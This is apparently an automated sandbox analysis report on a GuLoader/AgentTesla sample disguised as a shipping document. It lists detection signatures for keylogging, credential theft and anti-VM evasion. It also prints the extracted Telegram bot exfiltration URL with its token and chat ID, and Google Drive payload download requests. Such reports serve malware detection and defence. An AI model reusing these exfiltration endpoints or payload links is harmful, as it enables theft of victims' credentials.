Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report CI and PL of CMZBD-210090.exe

Overview

General Information

Sample Name:CI and PL of CMZBD-210090.exe
Analysis ID:483265
MD5:1f9b03378d7dc859a1c6e13a5832582e
SHA1:670bf2c5dbc7f6f8d9d1ec4b8d6c527a5eefdb8b
SHA256:ce8385347104cf190b23811bb67ba8edac9186073d6953ca23720f1e92af7eb3
Tags:exeguloader
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
GuLoader behavior detected
Hides threads from debuggers
Installs a global keyboard hook
Writes to foreign memory regions
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • CI and PL of CMZBD-210090.exe (PID: 5656 cmdline: 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe' MD5: 1F9B03378D7DC859A1C6E13A5832582E)
    • RegAsm.exe (PID: 6836 cmdline: 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1985758957", "Chat URL": "https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 6836JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 6836JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: conhost.exe.5404.16.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1985758957", "Chat URL": "https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument"}
            Source: RegAsm.exe.6836.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendMessage"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: CI and PL of CMZBD-210090.exeReversingLabs: Detection: 11%
            Machine Learning detection for sampleShow sources
            Source: CI and PL of CMZBD-210090.exeJoe Sandbox ML: detected
            Source: 0.0.CI and PL of CMZBD-210090.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
            Source: 0.2.CI and PL of CMZBD-210090.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
            Source: CI and PL of CMZBD-210090.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.4:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.4:49839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49840 version: TLS 1.2

            Networking:

            barindex
            Uses the Telegram API (likely for C&C communication)Show sources
            Source: unknownDNS query: name: api.telegram.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: POST /bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d977c904b0d17dHost: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX; ANID=AHWqTUlSr3088pwoykfOo43D99cbT1sB7DrGAvl1SaoiUj9-jegdSaaNEmuC6sED
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47miito3jg5v0470e1itperpsq7fa1/1631637675000/05708870864161384939/*/1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-00-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 0000000F.00000002.1742119107.000000001DF5F000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, RegAsm.exe, 0000000F.00000003.1415072188.000000001CAC1000.00000004.00000001.sdmp, RegAsm.exe, 0000000F.00000002.1741992038.000000001DF0B000.00000004.00000001.sdmpString found in binary or memory: http://gxOGQX5zujpp76F.com
            Source: RegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: http://ykBzBB.com
            Source: RegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
            Source: RegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocumentdocument-----
            Source: RegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
            Source: RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownHTTP traffic detected: POST /bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d977c904b0d17dHost: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: CONSENT=YES+GB.en-GB+V9+BX; ANID=AHWqTUlSr3088pwoykfOo43D99cbT1sB7DrGAvl1SaoiUj9-jegdSaaNEmuC6sED
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47miito3jg5v0470e1itperpsq7fa1/1631637675000/05708870864161384939/*/1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-00-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.4:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.4:49839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49840 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000002.1068294289.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: CI and PL of CMZBD-210090.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_004011140_2_00401114
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6A68D815_2_1D6A68D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6A5B7815_2_1D6A5B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AAF4B15_2_1D6AAF4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D73E94815_2_1D73E948
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D739A0815_2_1D739A08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1DAE47A015_2_1DAE47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1DAE479015_2_1DAE4790
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1DAE477315_2_1DAE4773
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1DAE475015_2_1DAE4750
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 98%
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000000.653490738.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemeta.exe vs CI and PL of CMZBD-210090.exe
            Source: CI and PL of CMZBD-210090.exeBinary or memory string: OriginalFilenamemeta.exe vs CI and PL of CMZBD-210090.exe
            Source: CI and PL of CMZBD-210090.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: CI and PL of CMZBD-210090.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: CI and PL of CMZBD-210090.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: CI and PL of CMZBD-210090.exeReversingLabs: Detection: 11%
            Source: CI and PL of CMZBD-210090.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe'
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_00404440 push 00401106h; ret 0_2_00404453
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_00404454 push 00401106h; ret 0_2_00404467
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_00404429 push 00401106h; ret 0_2_0040443F
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_0040819A push 0000002Bh; ret 0_2_004081A1
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_0040A28B push cs; ret 0_2_0040A29F
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeCode function: 0_2_021E0C05 pushfd ; iretd 0_2_021E0C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00D8DB64 push cs; iretd 15_2_00D8DB65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6A4D2F push 0000001Dh; retf 15_2_1D6A4D44
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AD502 push 0000001Dh; ret 15_2_1D6AD4E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AD502 push 0000001Dh; iretd 15_2_1D6AD51C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AD51F push 0000001Dh; iretd 15_2_1D6AD51C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AB5BF push edi; retn 0000h15_2_1D6AB5C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AAD87 push 0000001Dh; ret 15_2_1D6AADB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AAC7F push 0000001Dh; ret 15_2_1D6AAC90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AACEB push 0000001Dh; ret 15_2_1D6AAD28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6AD4DF push 0000001Dh; ret 15_2_1D6AD4E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6A4BFF push 0000001Dh; retf 15_2_1D6A4C14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1DAEC550 push ds; ret 15_2_1DAEC583
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
